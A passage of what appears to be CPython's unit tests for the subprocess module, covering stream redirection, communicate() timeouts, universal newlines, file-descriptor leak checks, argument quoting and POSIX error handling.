sys.stdout.write("orange")'], stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), b"orange") def test_stdout_filedes(self): # stdout is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=d) p.wait() os.lseek(d, 0, 0) self.assertEqual(os.read(d, 1024), b"orange") def test_stdout_fileobj(self): # stdout is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=tf) p.wait() tf.seek(0) self.assertEqual(tf.read(), b"orange") def test_stderr_pipe(self): # stderr redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=subprocess.PIPE) self.addCleanup(p.stderr.close) self.assertStderrEqual(p.stderr.read(), b"strawberry") def test_stderr_filedes(self): # stderr is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=d) p.wait() os.lseek(d, 0, 0) self.assertStderrEqual(os.read(d, 1024), b"strawberry") def test_stderr_fileobj(self): # stderr is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), b"strawberry") def test_stdout_stderr_pipe(self): # capture stdout and stderr to the same pipe p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) self.addCleanup(p.stdout.close) self.assertStderrEqual(p.stdout.read(), b"appleorange") def test_stdout_stderr_file(self): # capture stdout and stderr to the same open file tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=tf, stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), b"appleorange") def test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # To avoid printing the text on stdout, we do something similar to # test_stdout_none (see above). The parent subprocess calls the child # subprocess passing stdout=1, and this test uses stdout=PIPE in # order to capture and check the output of the parent. See #11963. code = ('import sys, subprocess; ' 'rc = subprocess.call([sys.executable, "-c", ' ' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), ' 'b\'test with stdout=1\'))"], stdout=1); ' 'assert rc == 18') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), b'test with stdout=1') def test_stdout_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'for i in range(10240):' 'print("x" * 1024)'], stdout=subprocess.DEVNULL) p.wait() self.assertEqual(p.stdout, None) def test_stderr_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'import sys\n' 'for i in range(10240):' 'sys.stderr.write("x" * 1024)'], stderr=subprocess.DEVNULL) p.wait() self.assertEqual(p.stderr, None) def test_stdin_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdin.read(1)'], stdin=subprocess.DEVNULL) p.wait() self.assertEqual(p.stdin, None) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" with subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, env=newenv) as p: stdout, stderr = p.communicate() self.assertEqual(stdout, b"orange") # Windows requires at least the SYSTEMROOT environment variable to start # Python @unittest.skipIf(sys.platform == 'win32', 'cannot test an empty env on Windows') @unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None, 'the python library cannot be loaded ' 'with an empty environment') def test_empty_env(self): with subprocess.Popen([sys.executable, "-c", 'import os; ' 'print(list(os.environ.keys()))'], stdout=subprocess.PIPE, env={}) as p: stdout, stderr = p.communicate() self.assertIn(stdout.strip(), (b"[]", # Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty # environment b"['__CF_USER_TEXT_ENCODING']")) def test_communicate_stdin(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.communicate(b"pear") self.assertEqual(p.returncode, 1) def test_communicate_stdout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("pineapple")'], stdout=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, b"pineapple") self.assertEqual(stderr, None) def test_communicate_stderr(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("pineapple")'], stderr=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertStderrEqual(stderr, b"pineapple") def test_communicate(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stderr.write("pineapple");' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) (stdout, stderr) = p.communicate(b"banana") self.assertEqual(stdout, b"banana") self.assertStderrEqual(stderr, b"pineapple") def test_communicate_timeout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os,time;' 'sys.stderr.write("pineapple\\n");' 'time.sleep(1);' 'sys.stderr.write("pear\\n");' 'sys.stdout.write(sys.stdin.read())'], universal_newlines=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana", timeout=0.3) # Make sure we can keep waiting for it, and that we get the whole output # after it completes. (stdout, stderr) = p.communicate() self.assertEqual(stdout, "banana") self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n") def test_communicate_timeout_large_ouput(self): # Test an expiring timeout while the child is outputting lots of data. p = subprocess.Popen([sys.executable, "-c", 'import sys,os,time;' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));'], stdout=subprocess.PIPE) self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4) (stdout, _) = p.communicate() self.assertEqual(len(stdout), 4 * 64 * 1024) # Test for the fd leak reported in http://bugs.python.org/issue2791. def test_communicate_pipe_fd_leak(self): for stdin_pipe in (False, True): for stdout_pipe in (False, True): for stderr_pipe in (False, True): options = {} if stdin_pipe: options['stdin'] = subprocess.PIPE if stdout_pipe: options['stdout'] = subprocess.PIPE if stderr_pipe: options['stderr'] = subprocess.PIPE if not options: continue p = subprocess.Popen((sys.executable, "-c", "pass"), **options) p.communicate() if p.stdin is not None: self.assertTrue(p.stdin.closed) if p.stdout is not None: self.assertTrue(p.stdout.closed) if p.stderr is not None: self.assertTrue(p.stderr.closed) def test_communicate_returns(self): # communicate() should return None if no redirection is active p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(47)"]) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertEqual(stderr, None) def test_communicate_pipe_buf(self): # communicate() with writes larger than pipe_buf # This test will probably deadlock rather than fail, if # communicate() does not work properly. x, y = os.pipe() os.close(x) os.close(y) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read(47));' 'sys.stderr.write("x" * %d);' 'sys.stdout.write(sys.stdin.read())' % support.PIPE_MAX_SIZE], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) string_to_write = b"a" * support.PIPE_MAX_SIZE (stdout, stderr) = p.communicate(string_to_write) self.assertEqual(stdout, string_to_write) def test_writes_before_communicate(self): # stdin.write before communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.stdin.write(b"banana") (stdout, stderr) = p.communicate(b"split") self.assertEqual(stdout, b"bananasplit") self.assertStderrEqual(stderr, b"") def test_universal_newlines(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'buf = sys.stdout.buffer;' 'buf.write(sys.stdin.readline().encode());' 'buf.flush();' 'buf.write(b"line2\\n");' 'buf.flush();' 'buf.write(sys.stdin.read().encode());' 'buf.flush();' 'buf.write(b"line4\\n");' 'buf.flush();' 'buf.write(b"line5\\r\\n");' 'buf.flush();' 'buf.write(b"line6\\r");' 'buf.flush();' 'buf.write(b"\\nline7");' 'buf.flush();' 'buf.write(b"\\nline8");'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=1) p.stdin.write("line1\n") p.stdin.flush() self.assertEqual(p.stdout.readline(), "line1\n") p.stdin.write("line3\n") p.stdin.close() self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.readline(), "line2\n") self.assertEqual(p.stdout.read(6), "line3\n") self.assertEqual(p.stdout.read(), "line4\nline5\nline6\nline7\nline8") def test_universal_newlines_communicate(self): # universal newlines through communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'buf = sys.stdout.buffer;' 'buf.write(b"line2\\n");' 'buf.flush();' 'buf.write(b"line4\\n");' 'buf.flush();' 'buf.write(b"line5\\r\\n");' 'buf.flush();' 'buf.write(b"line6\\r");' 'buf.flush();' 'buf.write(b"\\nline7");' 'buf.flush();' 'buf.write(b"\\nline8");'], stderr=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate() self.assertEqual(stdout, "line2\nline4\nline5\nline6\nline7\nline8") def test_universal_newlines_communicate_stdin(self): # universal newlines through communicate(), with only stdin p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + textwrap.dedent(''' s = sys.stdin.readline() assert s == "line1\\n", repr(s) s = sys.stdin.read() assert s == "line3\\n", repr(s) ''')], stdin=subprocess.PIPE, universal_newlines=1) (stdout, stderr) = p.communicate("line1\nline3\n") self.assertEqual(p.returncode, 0) def test_universal_newlines_communicate_input_none(self): # Test communicate(input=None) with universal newlines. # # We set stdout to PIPE because, as of this writing, a different # code path is tested when the number of pipes is zero or one. p = subprocess.Popen([sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True) p.communicate() self.assertEqual(p.returncode, 0) def test_universal_newlines_communicate_stdin_stdout_stderr(self): # universal newlines through communicate(), with stdin, stdout, stderr p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + textwrap.dedent(''' s = sys.stdin.buffer.readline() sys.stdout.buffer.write(s) sys.stdout.buffer.write(b"line2\\r") sys.stderr.buffer.write(b"eline2\\n") s = sys.stdin.buffer.read() sys.stdout.buffer.write(s) sys.stdout.buffer.write(b"line4\\n") sys.stdout.buffer.write(b"line5\\r\\n") sys.stderr.buffer.write(b"eline6\\r") sys.stderr.buffer.write(b"eline7\\r\\nz") ''')], stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate("line1\nline3\n") self.assertEqual(p.returncode, 0) self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout) # Python debug build push something like "[42442 refs]\n" # to stderr at exit of subprocess. # Don't use assertStderrEqual because it strips CR and LF from output. self.assertTrue(stderr.startswith("eline2\neline6\neline7\n")) def test_universal_newlines_communicate_encodings(self): # Check that universal newlines mode works for various encodings, # in particular for encodings in the UTF-16 and UTF-32 families. # See issue #15595. # # UTF-16 and UTF-32-BE are sufficient to check both with BOM and # without, and UTF-16 and UTF-32. import _bootlocale for encoding in ['utf-16', 'utf-32-be']: old_getpreferredencoding = _bootlocale.getpreferredencoding # Indirectly via io.TextIOWrapper, Popen() defaults to # locale.getpreferredencoding(False) and earlier in Python 3.2 to # locale.getpreferredencoding(). def getpreferredencoding(do_setlocale=True): return encoding code = ("import sys; " r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" % encoding) args = [sys.executable, '-c', code] try: _bootlocale.getpreferredencoding = getpreferredencoding # We set stdin to be non-None because, as of this writing, # a different code path is used when the number of pipes is # zero or one. popen = subprocess.Popen(args, universal_newlines=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE) stdout, stderr = popen.communicate(input='') finally: _bootlocale.getpreferredencoding = old_getpreferredencoding self.assertEqual(stdout, '1\n2\n3\n4') def test_no_leaking(self): # Make sure we leak no resources if not mswindows: max_handles = 1026 # too much for most UNIX systems else: max_handles = 2050 # too much for (at least some) Windows setups handles = [] tmpdir = tempfile.mkdtemp() try: for i in range(max_handles): try: tmpfile = os.path.join(tmpdir, support.TESTFN) handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT)) except OSError as e: if e.errno != errno.EMFILE: raise break else: self.skipTest("failed to reach the file descriptor limit " "(tried %d)" % max_handles) # Close a couple of them (should be enough for a subprocess) for i in range(10): os.close(handles.pop()) # Loop creating some subprocesses. If one of them leaks some fds, # the next loop iteration will fail by reaching the max fd limit. for i in range(15): p = subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.read())"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) data = p.communicate(b"lime")[0] self.assertEqual(data, b"lime") finally: for h in handles: os.close(h) shutil.rmtree(tmpdir) def test_list2cmdline(self): self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']), '"a b c" d e') self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']), 'ab\\"c \\ d') self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']), 'ab\\"c " \\\\" d') self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']), 'a\\\\\\b "de fg" h') self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']), 'a\\\\\\"b c d') self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']), '"a\\\\b c" d e') self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']), '"a\\\\b\\ c" d e') self.assertEqual(subprocess.list2cmdline(['ab', '']), 'ab ""') def test_poll(self): p = subprocess.Popen([sys.executable, "-c", "import os; os.read(0, 1)"], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) self.assertIsNone(p.poll()) os.write(p.stdin.fileno(), b'A') p.wait() # Subsequent invocations should just return the returncode self.assertEqual(p.poll(), 0) def test_wait(self): p = subprocess.Popen([sys.executable, "-c", "pass"]) self.assertEqual(p.wait(), 0) # Subsequent invocations should just return the returncode self.assertEqual(p.wait(), 0) def test_wait_timeout(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(0.3)"]) with self.assertRaises(subprocess.TimeoutExpired) as c: p.wait(timeout=0.0001) self.assertIn("0.0001", str(c.exception)) # For coverage of __str__. # Some heavily loaded buildbots (sparc Debian 3.x) require this much # time to start. self.assertEqual(p.wait(timeout=3), 0) def test_invalid_bufsize(self): # an invalid type of the bufsize argument should raise # TypeError. with self.assertRaises(TypeError): subprocess.Popen([sys.executable, "-c", "pass"], "orange") def test_bufsize_is_none(self): # bufsize=None should be the same as bufsize=0. p = subprocess.Popen([sys.executable, "-c", "pass"], None) self.assertEqual(p.wait(), 0) # Again with keyword arg p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None) self.assertEqual(p.wait(), 0) def _test_bufsize_equal_one(self, line, expected, universal_newlines): # subprocess may deadlock with bufsize=1, see issue #21332 with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.readline());" "sys.stdout.flush()"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, bufsize=1, universal_newlines=universal_newlines) as p: p.stdin.write(line) # expect that it flushes the line in text mode os.close(p.stdin.fileno()) # close it without flushing the buffer read_line = p.stdout.readline() try: p.stdin.close() except OSError: pass p.stdin = None self.assertEqual(p.returncode, 0) self.assertEqual(read_line, expected) def test_bufsize_equal_one_text_mode(self): # line is flushed in text mode with bufsize=1. # we should get the full line in return line = "line\n" self._test_bufsize_equal_one(line, line, universal_newlines=True) def test_bufsize_equal_one_binary_mode(self): # line is not flushed in binary mode with bufsize=1. # we should get empty response line = b'line' + os.linesep.encode() # assume ascii-based locale self._test_bufsize_equal_one(line, b'', universal_newlines=False) def test_leaking_fds_on_error(self): # see bug #5179: Popen leaks file descriptors to PIPEs if # the child fails to execute; this will eventually exhaust # the maximum number of open fds. 1024 seems a very common # value for that limit, but Windows has 2048, so we loop # 1024 times (each call leaked two fds). for i in range(1024): with self.assertRaises(OSError) as c: subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) # ignore errors that indicate the command was not found if c.exception.errno not in (errno.ENOENT, errno.EACCES): raise c.exception @unittest.skipIf(threading is None, "threading required") def test_double_close_on_error(self): # Issue #18851 fds = [] def open_fds(): for i in range(20): fds.extend(os.pipe()) time.sleep(0.001) t = threading.Thread(target=open_fds) t.start() try: with self.assertRaises(EnvironmentError): subprocess.Popen(['nonexisting_i_hope'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: t.join() exc = None for fd in fds: # If a double close occurred, some of those fds will # already have been closed by mistake, and os.close() # here will raise. try: os.close(fd) except OSError as e: exc = e if exc is not None: raise exc @unittest.skipIf(threading is None, "threading required") def test_threadsafe_wait(self): """Issue21291: Popen.wait() needs to be threadsafe for returncode.""" proc = subprocess.Popen([sys.executable, '-c', 'import time; time.sleep(12)']) self.assertEqual(proc.returncode, None) results = [] def kill_proc_timer_thread(): results.append(('thread-start-poll-result', proc.poll())) # terminate it from the thread and wait for the result. proc.kill() proc.wait() results.append(('thread-after-kill-and-wait', proc.returncode)) # this wait should be a no-op given the above. proc.wait() results.append(('thread-after-second-wait', proc.returncode)) # This is a timing sensitive test, the failure mode is # triggered when both the main thread and this thread are in # the wait() call at once. The delay here is to allow the # main thread to most likely be blocked in its wait() call. t = threading.Timer(0.2, kill_proc_timer_thread) t.start() if mswindows: expected_errorcode = 1 else: # Should be -9 because of the proc.kill() from the thread. expected_errorcode = -9 # Wait for the process to finish; the thread should kill it # long before it finishes on its own. Supplying a timeout # triggers a different code path for better coverage. proc.wait(timeout=20) self.assertEqual(proc.returncode, expected_errorcode, msg="unexpected result in wait from main thread") # This should be a no-op with no change in returncode. proc.wait() self.assertEqual(proc.returncode, expected_errorcode, msg="unexpected result in second main wait.") t.join() # Ensure that all of the thread results are as expected. # When a race condition occurs in wait(), the returncode could # be set by the wrong thread that doesn't actually have it # leading to an incorrect value. self.assertEqual([('thread-start-poll-result', None), ('thread-after-kill-and-wait', expected_errorcode), ('thread-after-second-wait', expected_errorcode)], results) def test_issue8780(self): # Ensure that stdout is inherited from the parent # if stdout=PIPE is not used code = ';'.join(( 'import subprocess, sys', 'retcode = subprocess.call(' "[sys.executable, '-c', 'print(\"Hello World!\")'])", 'assert retcode == 0')) output = subprocess.check_output([sys.executable, '-c', code]) self.assertTrue(output.startswith(b'Hello World!'), ascii(output)) def test_handles_closed_on_exception(self): # If CreateProcess exits with an error, ensure the # duplicate output handles are released ifhandle, ifname = mkstemp() ofhandle, ofname = mkstemp() efhandle, efname = mkstemp() try: subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle, stderr=efhandle) except OSError: os.close(ifhandle) os.remove(ifname) os.close(ofhandle) os.remove(ofname) os.close(efhandle) os.remove(efname) self.assertFalse(os.path.exists(ifname)) self.assertFalse(os.path.exists(ofname)) self.assertFalse(os.path.exists(efname)) def test_communicate_epipe(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.communicate(b"x" * 2**20) def test_communicate_epipe_only_stdin(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) p.wait() p.communicate(b"x" * 2**20) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), "Requires signal.SIGUSR1") @unittest.skipUnless(hasattr(os, 'kill'), "Requires os.kill") @unittest.skipUnless(hasattr(os, 'getppid'), "Requires os.getppid") def test_communicate_eintr(self): # Issue #12493: communicate() should handle EINTR def handler(signum, frame): pass old_handler = signal.signal(signal.SIGUSR1, handler) self.addCleanup(signal.signal, signal.SIGUSR1, old_handler) args = [sys.executable, "-c", 'import os, signal;' 'os.kill(os.getppid(), signal.SIGUSR1)'] for stream in ('stdout', 'stderr'): kw = {stream: subprocess.PIPE} with subprocess.Popen(args, **kw) as process: # communicate() will be interrupted by SIGUSR1 process.communicate() # This test is Linux-ish specific for simplicity to at least have # some coverage. It is not a platform specific bug. @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") def test_failed_child_execute_fd_leak(self): """Test for the fork() failure fd leak reported in issue16327.""" fd_directory = '/proc/%d/fd' % os.getpid() fds_before_popen = os.listdir(fd_directory) with self.assertRaises(PopenTestException): PopenExecuteChildRaises( [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # NOTE: This test doesn't verify that the real _execute_child # does not close the file descriptors itself on the way out # during an exception. Code inspection has confirmed that. fds_after_exception = os.listdir(fd_directory) self.assertEqual(fds_before_popen, fds_after_exception) @unittest.skipIf(mswindows, "POSIX specific tests") class POSIXProcessTestCase(BaseTestCase): def setUp(self): super().setUp() self._nonexistent_dir = "/_this/pa.th/does/not/exist" def _get_chdir_exception(self): try: os.chdir(self._nonexistent_dir) except OSError as e: # This avoids hard coding the errno value or the OS perror() # string and instead capture the exception that we want to see # below for comparison. desired_exception = e desired_exception.strerror += ': ' + repr(self._nonexistent_dir) else: self.fail("chdir to nonexistant directory %s succeeded." % self._nonexistent_dir) return desired_exception def test_exception_cwd(self): """Test error in the child raised in the parent for a bad cwd.""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([sys.executable, "-c", ""], cwd=self._nonexistent_dir) except OSError as e: # Test that the child process chdir failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_exception_bad_executable(self): """Test error in the child raised in the parent for a bad executable.""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([sys.executable, "-c", ""], executable=self._nonexistent_dir) except OSError as e: # Test that the child process exec failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_exception_bad_args_0(self): """Test error in the child raised in the parent for a bad args[0].""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([self._nonexistent_dir, "-c", ""]) except OSError as e: # Test that the child process exec failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_restore_signals(self): # Code coverage for both values of restore_signals to make sure it # at least does not blow up. # A test for behavior would be complex. Contributions welcome. subprocess.call([sys.executable, "-c", ""], restore_signals=True) subprocess.call([sys.executable, "-c", ""], restore_signals=False) def test_start_new_session(self): # For code coverage of calling setsid(). We don't care if we get an # EPERM error from it depending on the test execution environment, that # still indicates that it was called. try: output = subprocess.check_output( [sys.executable, "-c", "import os; print(os.getpgid(os.getpid()))"], start_new_session=True) except OSError as e: if e.errno != errno.EPERM: raise else: parent_pgid = os.getpgid(os.getpid()) child_pgid = int(output) self.assertNotEqual(parent_pgid, child_pgid) def test_run_abort(self): # returncode handles signal termination with support.SuppressCrashReport(): p = subprocess.Popen([sys.executable, "-c", 'import os; os.abort()']) p.wait() self.assertEqual(-p.returncode, signal.SIGABRT) def test_preexec(self): # DISCLAIMER: Setting environment variables is *not* a good use # of a preexec_fn. This is merely a test. p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, preexec_fn=lambda: os.putenv("FRUIT", "apple")) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), b"apple") def test_preexec_exception(self): def raise_it(): raise ValueError("What if two swallows carried a coconut?") try: p = subprocess.Popen([sys.executable, "-c", ""], preexec_fn=raise_it) except subprocess.SubprocessError as e: self.assertTrue( subprocess._posixsubprocess, "Expected a ValueError from the preexec_fn") except ValueError as e: self.assertIn("coconut", e.args[0]) else: self.fail("Exception raised by preexec_fn did not make it " "to the parent process.") class _TestExecuteChildPopen(subprocess.Popen): """Used to test behavior at the end of _execute_child.""" def __init__(self, testcase, *args, **kwargs): self._testcase = testcase subprocess.Popen.__init__(self, *args, **kwargs) def _execute_child(self, *args, **kwargs): try: subprocess.Popen._execute_child(self, *args, **kwargs) finally: # Open a bunch of file descriptors and verify that # none of them are the same as the ones the Popen # instance is using for stdin/stdout/stderr. devzero_fds = [os.open("/dev/zero", os.O_RDONLY) for _ in range(8)] try: for fd in devzero_fds: self._testcase.assertNotIn( fd, (self.stdin.fileno(), self.stdout.fileno(), self.stderr.fileno()), msg="At least one fd was closed early.") finally: for fd in devzero_fds: os.close(fd) @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.") def test_preexec_errpipe_does_not_double_close_pipes(self): """Issue16140: Don't double close pipes on preexec error.""" def raise_it(): raise subprocess.SubprocessError( "force the _execute_child() errpipe_data path.") with self.assertRaises(subprocess.SubprocessError): self._TestExecuteChildPopen( self, [sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=raise_it) def test_preexec_gc_module_failure(self): # This tests the code that disables garbage collection if the child # process will execute any Python. def raise_runtime_error(): raise RuntimeError("this shouldn't escape") enabled = gc.isenabled() orig_gc_disable = gc.disable orig_gc_isenabled = gc.isenabled try: gc.disable() self.assertFalse(gc.isenabled()) subprocess.call([sys.executable, '-c', ''], preexec_fn=lambda: None) self.assertFalse(gc.isenabled(), "Popen enabled gc when it shouldn't.") gc.enable() self.assertTrue(gc.isenabled()) subprocess.call([sys.executable, '-c', ''], preexec_fn=lambda: None) self.assertTrue(gc.isenabled(), "Popen left gc disabled.") gc.disable = raise_runtime_error self.assertRaises(RuntimeError, subprocess.Popen, [sys.executable, '-c', ''], preexec_fn=lambda: None) del gc.isenabled # force an AttributeError self.assertRaises(AttributeError, subprocess.Popen, [sys.executable, '-c', ''], preexec_fn=lambda: None) finally: gc.disable = orig_gc_disable gc.isenabled = orig_gc_isenabled if not enabled: gc.disable() def test_args_string(self): # args is a string fd, fname = mkstemp() # reopen in text mode with open(fd, "w", errors="surrogateescape") as fobj: fobj.write("#!/bin/sh\n") fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.chmod(fname, 0o700) p = subprocess.Popen(fname) p.wait() os.remove(fname) self.assertEqual(p.returncode, 47) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], startupinfo=47) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], creationflags=47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen(["echo $FRUIT"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple") def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen("echo $FRUIT", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple") def test_call_string(self): # call() function with string argument on UNIX fd, fname = mkstemp() # reopen in text mode with open(fd, "w", errors="surrogateescape") as fobj: fobj.write("#!/bin/sh\n") fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.chmod(fname, 0o700) rc = subprocess.call(fname) os.remove(fname) self.assertEqual(rc, 47) def test_specific_shell(self): # Issue #9265: Incorrect name passed as arg[0]. shells = [] for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']: for name in ['bash', 'ksh']: sh = os.path.join(prefix, name) if os.path.isfile(sh): shells.append(sh) if not shells: # Will probably work for any shell but csh. self.skipTest("bash or ksh required for this test") sh = '/bin/sh' if os.path.isfile(sh) and not os.path.islink(sh): # Test will fail if /bin/sh is a symlink to csh. shells.append(sh) for sh in shells: p = subprocess.Popen("echo $0", executable=sh, shell=True, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) 